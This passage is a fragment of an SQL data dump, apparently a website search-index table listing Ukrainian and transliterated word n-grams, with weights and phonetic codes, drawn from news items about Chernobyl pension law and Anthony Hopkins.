втратою',0,1,1.5667,'з000',1,'*'),(1679097,'здоров\'ю','здоров',0,0,0.5333,'з000',1,'*'),(1679098,'здоров\'ю та','здоров та',0,1,1.3667,'з000',1,'*'),(1679099,'здоров\'ю та щомісячна','здоров та щомісячна',0,1,1.7,'з000',1,'*'),(1679100,'його положень','його положень',0,1,1.4333,'й000',1,'*'),(1679101,'його положень набрали','його положень набрали',0,1,1.7,'й000',1,'*'),(1679102,'каліцтва','каліцтва',0,0,0.5333,'к000',1,'*'),(1679103,'каліцтва чи','каліцтва чи',0,1,1.3667,'к000',1,'*'),(1679104,'каліцтва чи захворювання','каліцтва чи захворювання',0,1,1.8,'к000',1,'*'),(1679105,'календарний місяць','календарний місяць',0,1,1.6,'к000',1,'*'),(1679106,'календарний місяць з','календарний місяць з',0,1,1.6667,'к000',1,'*'),(1679107,'календарних','календарних',0,0,0.7333,'к000',1,'*'),(1679108,'календарних днів','календарних днів',0,1,1.5333,'к000',1,'*'),(1679109,'календарних днів роботи','календарних днів роботи',0,1,1.7667,'к000',1,'*'),(1679110,'календарних днів у','календарних днів у',0,1,1.6,'к000',1,'*'),(1679111,'катастрофи','катастрофи',0,0,0.6667,'к000',1,'*'),(1679112,'катастрофи виплачується','катастрофи виплачується',0,1,1.7667,'к000',1,'*'),(1679113,'катастрофи виплачується повністю','катастрофи виплачується повністю',0,1,2,'к000',1,'*'),(1679114,'катастрофи державної','катастрофи державної',0,1,1.6667,'к000',1,'*'),(1679115,'катастрофи державної адресної','катастрофи державної адресної',0,1,1.9667,'к000',1,'*'),(1679116,'компенсація','компенсація',0,0,0.7333,'к000',1,'*'),(1679117,'компенсація сім\'ям','компенсація сім',0,1,1.6,'к000',1,'*'),(1679118,'компенсація сім\'ям за','компенсація сім за',0,1,1.7,'к000',1,'*'),(1679119,'ліквідації інших','ліквідації інших',0,1,1.5333,'л000',1,'*'),(1679120,'ліквідації інших ядерних','ліквідації інших ядерних',0,1,1.8,'л000',1,'*'),(1679121,'липня про','липня про',0,1,1.3,'л000',1,'*'),(1679122,'липня про мінімальні','липня про мінімальні',0,1,1.6667,'л000',1,'*'),(1679123,'мінімальні','мінімальні',0,0,0.6667,'м000',1,'*'),(1679124,'мінімальні розміри','мінімальні розміри',0,1,1.6,'м000',1,'*'),(1679125,'мінімальні розміри пенсії','мінімальні розміри пенсії',0,1,1.8333,'м000',1,'*'),(1679126,'мінімальної','мінімальної',0,0,0.7333,'м000',1,'*'),(1679127,'мінімальної зарплати','мінімальної зарплати',0,1,1.6667,'м000',1,'*'),(1679128,'мінімальної зарплати встановленої','мінімальної зарплати встановленої',0,1,2,'м000',1,'*'),(1679129,'місяці ділиться','місяці ділиться',0,1,1.5,'м000',1,'*'),(1679130,'місяці ділиться на','місяці ділиться на',0,1,1.6,'м000',1,'*'),(1679131,'місяців зарплата','місяців зарплата',0,1,1.5333,'м000',1,'*'),(1679132,'місяців зарплата визначається','місяців зарплата визначається',0,1,1.9667,'м000',1,'*'),(1679133,'місяців менше','місяців менше',0,1,1.4333,'м000',1,'*'),(1679134,'місяців менше 30','місяців менше 30',0,1,1.5333,'м000',1,'*'),(1679135,'місяць','місяць',0,0,0.4,'м000',1,'*'),(1679136,'місяць з','місяць з',0,1,1.2667,'м000',1,'*'),(1679137,'місяць з додаванням','місяць з додаванням',0,1,1.6333,'м000',1,'*'),(1679138,'місяць зарплата','місяць зарплата',0,1,1.5,'м000',1,'*'),(1679139,'місяць зарплата визначається','місяць зарплата визначається',0,1,1.9333,'м000',1,'*'),(1679140,'місяцях','місяцях',0,0,0.4667,'м000',1,'*'),(1679141,'місяцях зарплата','місяцях зарплата',0,1,1.5333,'м000',1,'*'),(1679142,'місяцях зарплата визначається','місяцях зарплата визначається',0,1,1.9667,'м000',1,'*'),(1679143,'менше 30','менше 30',0,1,1.2667,'м000',1,'*'),(1679144,'менше 30 календарних','менше 30 календарних',0,1,1.6667,'м000',1,'*'),(1679145,'на 1 січня','на 1 січня',0,1,1.3333,'н000',1,'*'),(1679146,'на держпенсію','на держпенсію',0,1,1.4333,'н000',1,'*'),(1679147,'на держпенсію у','на держпенсію у',0,1,1.5,'н000',1,'*'),(1679148,'на основній','на основній',0,1,1.3667,'н000',1,'*'),(1679149,'на основній роботі','на основній роботі',0,1,1.6,'н000',1,'*'),(1679150,'на територіях','на територіях',0,1,1.4333,'н000',1,'*'),(1679151,'на територіях радіоактивного','на територіях радіоактивного',0,1,1.9333,'н000',1,'*'),(1679152,'на чаес','на чаес',0,1,1.2333,'н000',1,'*'),(1679153,'на чаес інвалідність','на чаес інвалідність',0,1,1.6667,'н000',1,'*'),(1679154,'на число','на число',0,1,1.2667,'н000',1,'*'),(1679155,'на число відпрацьованих','на число відпрацьованих',0,1,1.7667,'н000',1,'*'),(1679156,'набере','набере',0,0,0.4,'н000',1,'*'),(1679157,'набере чинності','набере чинності',0,1,1.5,'н000',1,'*'),(1679158,'набере чинності з','набере чинності з',0,1,1.5667,'н000',1,'*'),(1679159,'набрав','набрав',0,0,0.4,'н000',1,'*'),(1679160,'набрав чинності','набрав чинності',0,1,1.5,'н000',1,'*'),(1679161,'набрав чинності закон','набрав чинності закон',0,1,1.7,'н000',1,'*'),(1679162,'набрали','набрали',0,0,0.4667,'н000',1,'*'),(1679163,'набрали чинності','набрали чинності',0,1,1.5333,'н000',1,'*'),(1679164,'набрали чинності з','набрали чинності з',0,1,1.6,'н000',1,'*'),(1679165,'навчаннях','навчаннях',0,0,0.6,'н000',1,'*'),(1679166,'навчаннях із','навчаннях із',0,1,1.4,'н000',1,'*'),(1679167,'навчаннях із застосуванням','навчаннях із застосуванням',0,1,1.8667,'н000',1,'*'),(1679168,'надали','надали',0,0,0.4,'н000',2,'*'),(1679169,'надали право','надали право',0,1,1.4,'н000',1,'*'),(1679170,'надали право на','надали право на',0,1,1.5,'н000',1,'*'),(1679171,'нарахування','нарахування',0,0,0.7333,'н000',2,'*'),(1679172,'нарахування певного','нарахування певного',0,1,1.6333,'н000',1,'*'),(1679173,'нарахування певного розміру','нарахування певного розміру',0,1,1.9,'н000',1,'*'),(1679174,'наслідків','наслідків',0,0,0.6,'н000',1,'*'),(1679175,'наслідків у','наслідків у',0,1,1.3667,'н000',1,'*'),(1679176,'наслідків у ядерних','наслідків у ядерних',0,1,1.6333,'н000',1,'*'),(1679177,'настала','настала',0,0,0.4667,'н000',1,'*'),(1679178,'настала внаслідок','настала внаслідок',0,1,1.5667,'н000',1,'*'),(1679179,'настала внаслідок каліцтва','настала внаслідок каліцтва',0,1,1.8667,'н000',1,'*'),(1679180,'не залежить','не залежить',0,1,1.3667,'н000',1,'*'),(1679181,'не залежить від','не залежить від',0,1,1.5,'н000',1,'*'),(1679182,'один календарний','один календарний',0,1,1.5333,'о000',1,'*'),(1679183,'один календарний місяць','один календарний місяць',0,1,1.7667,'о000',1,'*'),(1679184,'опублікували','опублікували',0,0,0.8,'о000',1,'*'),(1679185,'опублікували у','опублікували у',0,1,1.4667,'о000',1,'*'),(1679186,'опублікували у виданні','опублікували у виданні',0,1,1.7333,'о000',1,'*'),(1679187,'основній','основній',0,0,0.5333,'о000',1,'*'),(1679188,'основній роботі','основній роботі',0,1,1.5,'о000',1,'*'),(1679189,'основній роботі українцям','основній роботі українцям',0,1,1.8333,'о000',1,'*'),(1679190,'особами','особами',0,0,0.4667,'о000',1,'*'),(1679191,'особами з','особами з',0,1,1.3,'о000',1,'*'),(1679192,'особами з інвалідністю','особами з інвалідністю',0,1,1.7333,'о000',1,'*'),(1679193,'отримали в','отримали в',0,1,1.3333,'о000',1,'*'),(1679194,'отримали в результаті','отримали в результаті',0,1,1.7,'о000',1,'*'),(1679195,'п\'ятикратного','п',0,0,0.8667,'п000',1,'*'),(1679196,'п\'ятикратного розміру','п розміру',0,1,1.7,'п000',1,'*'),(1679197,'п\'ятикратного розміру від','п розміру від',0,1,1.8333,'п000',1,'*'),(1679198,'підвищення пенсій','підвищення пенсій',0,1,1.5667,'п000',1,'*'),(1679199,'підвищення пенсій для','підвищення пенсій для',0,1,1.7,'п000',1,'*'),(1679200,'певного','певного',0,0,0.4667,'п000',1,'*'),(1679201,'певного розміру','певного розміру',0,1,1.5,'п000',1,'*'),(1679202,'певного розміру пенсії','певного розміру пенсії',0,1,1.7333,'п000',1,'*'),(1679203,'пенсії','пенсії',0,0,0.4,'п000',1,'*'),(1679204,'пенсії із','пенсії із',0,1,1.3,'п000',1,'*'),(1679205,'пенсії із закону','пенсії із закону',0,1,1.5333,'п000',1,'*'),(1679206,'пенсії по','пенсії по',0,1,1.3,'п000',1,'*'),(1679207,'пенсії по інвалідності','пенсії по інвалідності',0,1,1.7333,'п000',1,'*'),(1679208,'пенсії українцям','пенсії українцям',0,1,1.5333,'п000',1,'*'),(1679209,'пенсії українцям які','пенсії українцям які',0,1,1.6667,'п000',1,'*'),(1679210,'пенсій','пенсій',0,0,0.4,'п000',1,'*'),(1679211,'пенсій для','пенсій для',0,1,1.3333,'п000',1,'*'),(1679212,'пенсій для чорнобильців','пенсій для чорнобильців',0,1,1.7667,'п000',1,'*'),(1679213,'пенсій чи','пенсій чи',0,1,1.3,'п000',1,'*'),(1679214,'пенсій чи інших','пенсій чи інших',0,1,1.5,'п000',1,'*'),(1679215,'пенсіонерів','пенсіонерів',0,0,0.7333,'п000',1,'*'),(1679216,'пенсіонерів чорнобильців','пенсіонерів чорнобильців',0,1,1.8,'п000',1,'*'),(1679217,'пенсія','пенсія',0,0,0.4,'п000',1,'*'),(1679218,'пенсія за','пенсія за',0,1,1.3,'п000',1,'*'),(1679219,'пенсія за шкоду','пенсія за шкоду',0,1,1.5,'п000',1,'*'),(1679220,'передбачає','передбачає',0,0,0.6667,'п000',1,'*'),(1679221,'передбачає підвищення','передбачає підвищення',0,1,1.7,'п000',1,'*'),(1679222,'передбачає підвищення пенсій','передбачає підвищення пенсій',0,1,1.9333,'п000',1,'*'),(1679223,'першої','першої',0,0,0.4,'п000',1,'*'),(1679224,'першої групи','першої групи',0,1,1.4,'п000',1,'*'),(1679225,'першої групи 16','першої групи 16',0,1,1.5,'п000',1,'*'),(1679226,'плати','плати',0,0,0.3333,'п000',3,'*'),(1679227,'плати на','плати на',0,1,1.2667,'п000',1,'*'),(1679228,'плати на основній','плати на основній',0,1,1.5667,'п000',1,'*'),(1679229,'по інвалідності','по інвалідності',0,1,1.5,'п000',1,'*'),(1679230,'по інвалідності що','по інвалідності що',0,1,1.6,'п000',1,'*'),(1679231,'повністю','повністю',0,0,0.5333,'п000',1,'*'),(1679232,'повністю і','повністю і',0,1,1.3333,'п000',1,'*'),(1679233,'повністю і не','повністю і не',0,1,1.4333,'п000',1,'*'),(1679234,'повністю він','повністю він',0,1,1.4,'п000',1,'*'),(1679235,'повністю він набере','повністю він набере',0,1,1.6333,'п000',1,'*'),(1679236,'положень','положень',0,0,0.5333,'п000',1,'*'),(1679237,'положень набрали','положень набрали',0,1,1.5333,'п000',1,'*'),(1679238,'положень набрали чинності','положень набрали чинності',0,1,1.8333,'п000',1,'*'),(1679239,'право на','право на',0,1,1.2667,'п000',1,'*'),(1679240,'право на держпенсію','право на держпенсію',0,1,1.6333,'п000',1,'*'),(1679241,'про мінімальні','про мінімальні',0,1,1.4667,'п000',1,'*'),(1679242,'про мінімальні розміри','про мінімальні розміри',0,1,1.7333,'п000',1,'*'),(1679243,'прописано','прописано',0,0,0.6,'п000',1,'*'),(1679244,'прописано що','прописано що',0,1,1.4,'п000',1,'*'),(1679245,'прописано що для','прописано що для',0,1,1.5333,'п000',1,'*'),(1679246,'пропрацювали','пропрацювали',0,0,0.8,'п000',1,'*'),(1679247,'пропрацювали на','пропрацювали на',0,1,1.5,'п000',1,'*'),(1679248,'пропрацювали на територіях','пропрацювали на територіях',0,1,1.8667,'п000',1,'*'),(1679249,'різних формул','різних формул',0,1,1.4333,'р000',1,'*'),(1679250,'різних формул як','різних формул як',0,1,1.5333,'р000',1,'*'),(1679251,'радіоактивного','радіоактивного',0,0,0.9333,'р000',1,'*'),(1679252,'радіоактивного забруднення','радіоактивного забруднення',0,1,1.8667,'р000',1,'*'),(1679253,'радіоактивного забруднення будуть','радіоактивного забруднення будуть',0,1,2,'р000',1,'*'),(1679254,'результаті','результаті',0,0,0.6667,'р000',1,'*'),(1679255,'результаті аварії','результаті аварії',0,1,1.5667,'р000',1,'*'),(1679256,'результаті аварії на','результаті аварії на',0,1,1.6667,'р000',1,'*'),(1679257,'роботі','роботі',0,0,0.4,'р000',1,'*'),(1679258,'роботі українцям','роботі українцям',0,1,1.5333,'р000',1,'*'),(1679259,'роботі українцям які','роботі українцям які',0,1,1.6667,'р000',1,'*'),(1679260,'роботи як','роботи як',0,1,1.3,'р000',1,'*'),(1679261,'роботи як місяць','роботи як місяць',0,1,1.5333,'р000',1,'*'),(1679262,'розмірі','розмірі',0,0,0.4667,'р000',1,'*'),(1679263,'розмірі п\'ятикратного','розмірі п',0,1,1.7,'р000',1,'*'),(1679264,'розмірі п\'ятикратного розміру','розмірі п розміру',0,1,1.9667,'р000',1,'*'),(1679265,'розміри','розміри',0,0,0.4667,'р000',1,'*'),(1679266,'розміри пенсії','розміри пенсії',0,1,1.4667,'р000',1,'*'),(1679267,'розміри пенсії по','розміри пенсії по',0,1,1.5667,'р000',1,'*'),(1679268,'розміру','розміру',0,0,0.4667,'р000',1,'*'),(1679269,'розміру від','розміру від',0,1,1.3667,'р000',1,'*'),(1679270,'розміру від розміру','розміру від розміру',0,1,1.6333,'р000',1,'*'),(1679271,'розміру мінімальної','розміру мінімальної',0,1,1.6333,'р000',1,'*'),(1679272,'розміру мінімальної зарплати','розміру мінімальної зарплати',0,1,1.9333,'р000',1,'*'),(1679273,'розміру пенсії','розміру пенсії',0,1,1.4667,'р000',1,'*'),(1679274,'розміру пенсії українцям','розміру пенсії українцям',0,1,1.8,'р000',1,'*'),(1679275,'року документ','року документ',0,1,1.4333,'р000',1,'*'),(1679276,'року документ вчора','року документ вчора',0,1,1.6333,'р000',1,'*'),(1679277,'року так виплати','року так виплати',0,1,1.5333,'р000',1,'*'),(1679278,'ряд','ряд',0,0,0.2,'р000',1,'*'),(1679279,'ряд його','ряд його',0,1,1.2667,'р000',1,'*'),(1679280,'ряд його положень','ряд його положень',0,1,1.5667,'р000',1,'*'),(1679281,'сім\'ям','сім',0,0,0.4,'с000',1,'*'),(1679282,'сім\'ям за','сім за',0,1,1.3,'с000',1,'*'),(1679283,'сім\'ям за втрату','сім за втрату',0,1,1.5333,'с000',1,'*'),(1679284,'січня','січня',0,0,0.3333,'с000',3,'*'),(1679285,'січня 2022','січня 2022',0,1,1.3333,'с000',3,'*'),(1679286,'січня 2022 року','січня 2022 року',0,1,1.5,'с000',3,'*'),(1679287,'січня відповідного','січня відповідного',0,1,1.6,'с000',1,'*'),(1679288,'січня відповідного року','січня відповідного року',0,1,1.7667,'с000',1,'*'),(1679289,'складуть','складуть',0,0,0.5333,'с000',1,'*'),(1679290,'складуть першої','складуть першої',0,1,1.5,'с000',1,'*'),(1679291,'складуть першої групи','складуть першої групи',0,1,1.7,'с000',1,'*'),(1679292,'стали','стали',0,0,0.3333,'с000',1,'*'),(1679293,'стали особами','стали особами',0,1,1.4333,'с000',1,'*'),(1679294,'стали особами з','стали особами з',0,1,1.5,'с000',1,'*'),(1679295,'та їх','та їх',0,1,1.1667,'т000',1,'*'),(1679296,'та їх наслідків','та їх наслідків',0,1,1.5,'т000',1,'*'),(1679297,'та щомісячна','та щомісячна',0,1,1.4,'т000',1,'*'),(1679298,'та щомісячна компенсація','та щомісячна компенсація',0,1,1.8,'т000',1,'*'),(1679299,'так виплати','так виплати',0,1,1.3667,'т000',1,'*'),(1679300,'так виплати для','так виплати для',0,1,1.5,'т000',1,'*'),(1679301,'територіях','територіях',0,0,0.6667,'т000',1,'*'),(1679302,'територіях радіоактивного','територіях радіоактивного',0,1,1.8333,'т000',1,'*'),(1679303,'територіях радіоактивного забруднення','територіях радіоактивного забруднення',0,1,2,'т000',1,'*'),(1679304,'третьої групи','третьої групи',0,1,1.4333,'т000',1,'*'),(1679305,'третьої групи 8','третьої групи 8',0,1,1.5,'т000',1,'*'),(1679306,'у військових','у військових',0,1,1.4,'у000',1,'*'),(1679307,'у військових навчаннях','у військових навчаннях',0,1,1.7333,'у000',1,'*'),(1679308,'у виданні','у виданні',0,1,1.3,'у000',1,'*'),(1679309,'у виданні голос','у виданні голос',0,1,1.5,'у000',1,'*'),(1679310,'у двох','у двох',0,1,1.2,'у000',1,'*'),(1679311,'у двох місяцях','у двох місяцях',0,1,1.4667,'у000',1,'*'),(1679312,'у документі','у документі',0,1,1.3667,'у000',1,'*'),(1679313,'у документі прописано','у документі прописано',0,1,1.7,'у000',1,'*'),(1679314,'у зв\'язку з','у зв з',0,1,1.3667,'у000',1,'*'),(1679315,'у ліквідації','у ліквідації',0,1,1.4,'у000',1,'*'),(1679316,'у ліквідації інших','у ліквідації інших',0,1,1.6,'у000',1,'*'),(1679317,'у розмірі','у розмірі',0,1,1.3,'у000',1,'*'),(1679318,'у розмірі п\'ятикратного','у розмірі п',0,1,1.7667,'у000',1,'*'),(1679319,'у ядерних','у ядерних',0,1,1.3,'у000',1,'*'),(1679320,'у ядерних випробуваннях','у ядерних випробуваннях',0,1,1.7667,'у000',1,'*'),(1679321,'україні частково','україні частково',0,1,1.5333,'у000',1,'*'),(1679322,'україні частково набрав','україні частково набрав',0,1,1.7667,'у000',1,'*'),(1679323,'україни ряд','україни ряд',0,1,1.3667,'у000',1,'*'),(1679324,'україни ряд його','україни ряд його',0,1,1.5333,'у000',1,'*'),(1679325,'українцям','українцям',0,0,0.6,'у000',1,'*'),(1679326,'українцям які','українцям які',0,1,1.4333,'у000',1,'*'),(1679327,'українцям які брали','українцям які брали',0,1,1.6333,'у000',1,'*'),(1679328,'українцям які пропрацювали','українцям які пропрацювали',0,1,1.8667,'у000',1,'*'),(1679329,'участь у ліквідації','участь у ліквідації',0,1,1.6333,'у000',1,'*'),(1679330,'фактичні','фактичні',0,0,0.5333,'ф000',2,'*'),(1679331,'фактичні відпрацьовані','фактичні відпрацьовані',0,1,1.7333,'ф000',1,'*'),(1679332,'фактичні відпрацьовані 30','фактичні відпрацьовані 30',0,1,1.8333,'ф000',1,'*'),(1679333,'формул','формул',0,0,0.4,'ф000',1,'*'),(1679334,'формул як','формул як',0,1,1.3,'ф000',1,'*'),(1679335,'формул як 12','формул як 12',0,1,1.4,'ф000',1,'*'),(1679336,'формулою','формулою',0,0,0.5333,'ф000',1,'*'),(1679337,'формулою зарплата','формулою зарплата',0,1,1.5667,'ф000',1,'*'),(1679338,'формулою зарплата за','формулою зарплата за',0,1,1.6667,'ф000',1,'*'),(1679339,'ці місяці','ці місяці',0,1,1.3,'ц000',1,'*'),(1679340,'ці місяці ділиться','ці місяці ділиться',0,1,1.6,'ц000',1,'*'),(1679341,'цього стали','цього стали',0,1,1.3667,'ц000',1,'*'),(1679342,'цього стали особами','цього стали особами',0,1,1.6333,'ц000',1,'*'),(1679343,'чаес','чаес',0,0,0.2667,'ч000',1,'*'),(1679344,'чаес інвалідність','чаес інвалідність',0,1,1.5667,'ч000',1,'*'),(1679345,'чаес інвалідність складуть','чаес інвалідність складуть',0,1,1.8667,'ч000',1,'*'),(1679346,'частково набрав','частково набрав',0,1,1.5,'ч000',1,'*'),(1679347,'частково набрав чинності','частково набрав чинності',0,1,1.8,'ч000',1,'*'),(1679348,'чи інших','чи інших',0,1,1.2667,'ч000',1,'*'),(1679349,'чи інших доходів','чи інших доходів',0,1,1.5333,'ч000',1,'*'),(1679350,'чи захворювання','чи захворювання',0,1,1.5,'ч000',1,'*'),(1679351,'чи захворювання у','чи захворювання у',0,1,1.5667,'ч000',1,'*'),(1679352,'чинності','чинності',0,0,0.5333,'ч000',1,'*'),(1679353,'чинності з','чинності з',0,1,1.3333,'ч000',1,'*'),(1679354,'чинності з 1','чинності з 1',0,1,1.4,'ч000',1,'*'),(1679355,'чинності закон','чинності закон',0,1,1.4667,'ч000',1,'*'),(1679356,'чинності закон що','чинності закон що',0,1,1.5667,'ч000',1,'*'),(1679357,'число','число',0,0,0.3333,'ч000',1,'*'),(1679358,'число відпрацьованих','число відпрацьованих',0,1,1.6667,'ч000',1,'*'),(1679359,'число відпрацьованих місяців','число відпрацьованих місяців',0,1,1.9333,'ч000',1,'*'),(1679360,'чорнобильської','чорнобильської',0,0,0.9333,'ч000',1,'*'),(1679361,'чорнобильської катастрофи','чорнобильської катастрофи',0,1,1.8333,'ч000',1,'*'),(1679362,'чорнобильської катастрофи виплачується','чорнобильської катастрофи виплачується',0,1,2,'ч000',1,'*'),(1679363,'чорнобильської катастрофи державної','чорнобильської катастрофи державної',0,1,2,'ч000',1,'*'),(1679364,'чорнобильців','чорнобильців',0,0,0.8,'ч000',1,'*'),(1679365,'чорнобильців повністю','чорнобильців повністю',0,1,1.7,'ч000',1,'*'),(1679366,'чорнобильців повністю він','чорнобильців повністю він',0,1,1.8333,'ч000',1,'*'),(1679367,'чорнобильців які','чорнобильців які',0,1,1.5333,'ч000',1,'*'),(1679368,'чорнобильців які отримали','чорнобильців які отримали',0,1,1.8333,'ч000',1,'*'),(1679369,'шкоду','шкоду',0,0,0.3333,'ш000',1,'*'),(1679370,'шкоду заподіяну','шкоду заподіяну',0,1,1.5,'ш000',1,'*'),(1679371,'шкоду заподіяну здоров\'ю','шкоду заподіяну здоров',0,1,1.8,'ш000',1,'*'),(1679372,'що для','що для',0,1,1.2,'щ000',1,'*'),(1679373,'що для нарахування','що для нарахування',0,1,1.6,'щ000',1,'*'),(1679374,'що додаткова','що додаткова',0,1,1.4,'щ000',1,'*'),(1679375,'що додаткова пенсія','що додаткова пенсія',0,1,1.6333,'щ000',1,'*'),(1679376,'що настала','що настала',0,1,1.3333,'щ000',1,'*'),(1679377,'що настала внаслідок','що настала внаслідок',0,1,1.6667,'щ000',1,'*'),(1679378,'що передбачає','що передбачає',0,1,1.4333,'щ000',1,'*'),(1679379,'що передбачає підвищення','що передбачає підвищення',0,1,1.8,'щ000',1,'*'),(1679380,'щомісячна','щомісячна',0,0,0.6,'щ000',1,'*'),(1679381,'щомісячна компенсація','щомісячна компенсація',0,1,1.7,'щ000',1,'*'),(1679382,'щомісячна компенсація сім\'ям','щомісячна компенсація сім',0,1,1.9333,'щ000',1,'*'),(1679383,'ядерних','ядерних',0,0,0.4667,'я000',1,'*'),(1679384,'ядерних аварій','ядерних аварій',0,1,1.4667,'я000',1,'*'),(1679385,'ядерних аварій та','ядерних аварій та',0,1,1.5667,'я000',1,'*'),(1679386,'ядерних випробуваннях','ядерних випробуваннях',0,1,1.7,'я000',1,'*'),(1679387,'ядерних випробуваннях у','ядерних випробуваннях у',0,1,1.7667,'я000',1,'*'),(1679388,'ядерної','ядерної',0,0,0.4667,'я000',1,'*'),(1679389,'ядерної зброї','ядерної зброї',0,1,1.4333,'я000',1,'*'),(1679390,'ядерної зброї і','ядерної зброї і',0,1,1.5,'я000',1,'*'),(1679391,'як 12','як 12',0,1,1.1667,'я000',1,'*'),(1679392,'як 12 місяців','як 12 місяців',0,1,1.4333,'я000',1,'*'),(1679393,'як місяць','як місяць',0,1,1.3,'я000',1,'*'),(1679394,'як місяць зарплата','як місяць зарплата',0,1,1.6,'я000',1,'*'),(1679395,'які брали','які брали',0,1,1.3,'я000',1,'*'),(1679396,'які брали безпосередню','які брали безпосередню',0,1,1.7333,'я000',1,'*'),(1679397,'які отримали','які отримали',0,1,1.4,'я000',1,'*'),(1679398,'які отримали в','які отримали в',0,1,1.4667,'я000',1,'*'),(1679399,'які пропрацювали','які пропрацювали',0,1,1.5333,'я000',1,'*'),(1679400,'які пропрацювали на','які пропрацювали на',0,1,1.6333,'я000',1,'*'),(1679855,'09 lipnya','09 lipnya',0,1,1.3,'L150',1,'*'),(1679856,'09 lipnya 2021','09 lipnya 2021',0,1,1.4667,'L150',1,'*'),(1679857,'09 липня','09 липня',0,1,1.2667,'л000',1,'*'),(1679858,'09 липня 2021','09 липня 2021',0,1,1.4333,'л000',1,'*'),(1679859,'2 2526','2 2526',0,1,1.2,'',1,'*'),(1679860,'2 2526 09','2 2526 09',0,1,1.3,'',1,'*'),(1679861,'2021 kudi','2021 kudi',0,1,1.3,'K300',1,'*'),(1679862,'2021 kudi dali','2021 kudi dali',0,1,1.4667,'K340',1,'*'),(1679863,'2021 куди','2021 куди',0,1,1.3,'к000',1,'*'),(1679864,'2021 куди далі','2021 куди далі',0,1,1.4667,'к000',1,'*'),(1679865,'2526','2526',0,0,0.4,'',1,'*'),(1679866,'2526 09','2526 09',0,1,1.2333,'',1,'*'),(1679867,'2526 09 lipnya','2526 09 lipnya',0,1,1.4667,'L150',1,'*'),(1679868,'dali','dali',0,0,0.2667,'D400',1,'*'),(1679869,'kudi','kudi',0,0,0.2667,'K300',1,'*'),(1679870,'kudi dali','kudi dali',0,1,1.3,'K340',1,'*'),(1679871,'lipnya','lipnya',0,0,0.4,'L150',1,'*'),(1679872,'lipnya 2021','lipnya 2021',0,1,1.3667,'L150',1,'*'),(1679873,'lipnya 2021 kudi','lipnya 2021 kudi',0,1,1.5333,'L1523',1,'*'),(1679874,'novini 2 2526','novini 2 2526',0,1,1.4333,'N150',1,'*'),(1679875,'далі','далі',0,0,0.2667,'д000',2,'*'),(1679876,'куди','куди',0,0,0.2667,'к000',1,'*'),(1679877,'куди далі','куди далі',0,1,1.3,'к000',1,'*'),(1679878,'липня 2021','липня 2021',0,1,1.3333,'л000',1,'*'),(1679879,'липня 2021 куди','липня 2021 куди',0,1,1.5,'л000',1,'*'),(1680521,'2 2527','2 2527',0,1,1.2,'',1,'*'),(1680522,'2 2527 entoni','2 2527 entoni',0,1,1.4333,'E535',1,'*'),(1680523,'2527','2527',0,0,0.4,'',1,'*'),(1680524,'2527 entoni','2527 entoni',0,1,1.3667,'E535',1,'*'),(1680525,'2527 entoni gopkins','2527 entoni gopkins',0,1,1.6333,'E53521252',1,'*'),(1680526,'aktor','aktor',0,0,0.3333,'A236',1,'*'),(1680527,'aktor svitovogo','aktor svitovogo',0,1,1.5,'A23621312',1,'*'),(1680528,'aktor svitovogo rivnya','aktor svitovogo rivnya',0,1,1.7333,'A23621312615',1,'*'),(1680529,'ale','ale',0,0,0.2,'A400',1,'*'),(1680530,'ale j','ale j',0,1,1.1667,'A420',1,'*'),(1680531,'ale j avtor','ale j avtor',0,1,1.3667,'A42136',1,'*'),(1680532,'avtor','avtor',0,0,0.3333,'A136',1,'*'),(1680533,'avtor shikarnogo','avtor shikarnogo',0,1,1.5333,'A1362652',1,'*'),(1680534,'avtor shikarnogo valsu','avtor shikarnogo valsu',0,1,1.7333,'A1362652142',1,'*'),(1680535,'entoni','entoni',0,0,0.4,'E535',1,'*'),(1680536,'entoni gopkins','entoni gopkins',0,1,1.4667,'E53521252',1,'*'),(1680537,'entoni gopkins ne','entoni gopkins ne',0,1,1.5667,'E535212525',1,'*'),(1680538,'gopkins','gopkins',0,0,0.4667,'G1252',1,'*'),(1680539,'gopkins ne','gopkins ne',0,1,1.3333,'G12525',1,'*'),(1680540,'gopkins ne tilki','gopkins ne tilki',0,1,1.5333,'G12525342',1,'*'),(1680541,'j','j',0,0,0.0667,'J000',2,'*'),(1680542,'j avtor','j avtor',0,1,1.2333,'J136',1,'*'),(1680543,'j avtor shikarnogo','j avtor shikarnogo',0,1,1.6,'J1362652',1,'*'),(1680544,'ne tilki','ne tilki',0,1,1.2667,'N342',1,'*'),(1680545,'ne tilki aktor','ne tilki aktor',0,1,1.4667,'N34236',1,'*'),(1680546,'novini 2 2527','novini 2 2527',0,1,1.4333,'N150',1,'*'),(1680547,'rivnya','rivnya',0,0,0.4,'R150',1,'*'),(1680548,'rivnya ale','rivnya ale',0,1,1.3333,'R154',1,'*'),(1680549,'rivnya ale j','rivnya ale j',0,1,1.4,'R1542',1,'*'),(1680550,'shikarnogo','shikarnogo',0,0,0.6667,'S652',1,'*'),(1680551,'shikarnogo valsu','shikarnogo valsu',0,1,1.5333,'S652142',1,'*'),(1680552,'svitovogo','svitovogo',0,0,0.6,'S1312',1,'*'),(1680553,'svitovogo rivnya','svitovogo rivnya',0,1,1.5333,'S1312615',1,'*'),(1680554,'svitovogo rivnya ale','svitovogo rivnya ale',0,1,1.6667,'S13126154',1,'*'),(1680555,'tilki','tilki',0,0,0.3333,'T420',1,'*'),(1680556,'tilki aktor','tilki aktor',0,1,1.3667,'T4236',1,'*'),(1680557,'tilki aktor svitovogo','tilki aktor svitovogo',0,1,1.7,'T423621312',1,'*'),(1680558,'valsu','valsu',0,0,0.3333,'V420',1,'*'),(1680559,'автор','автор',0,0,0.3333,'а000',1,'*'),(1680560,'автор шикарного','автор шикарного',0,1,1.5,'а000',1,'*'),(1680561,'автор шикарного вальсу','автор шикарного вальсу',0,1,1.7333,'а000',1,'*'),(1680562,'актор','актор',0,0,0.3333,'а000',1,'*'),(1680563,'актор світового','актор світового',0,1,1.5,'а000',1,'*'),(1680564,'актор світового рівня','актор світового рівня',0,1,1.7,'а000',1,'*'),(1680565,'але й автор','але й автор',0,1,1.3667,'а000',1,'*'),(1680566,'вальсу','вальсу',0,0,0.4,'в000',1,'*'),(1680567,'гопкінс','гопкінс',0,0,0.4667,'г000',1,'*'),(1680568,'гопкінс не','гопкінс не',0,1,1.3333,'г000',1,'*'),(1680569,'гопкінс не тільки','гопкінс не тільки',0,1,1.5667,'г000',1,'*'),(1680570,'ентоні','ентоні',0,0,0.4,'е000',1,'*'),(1680571,'ентоні гопкінс','ентоні гопкінс',0,1,1.4667,'е000',1,'*'),(1680572,'ентоні гопкінс не','ентоні гопкінс 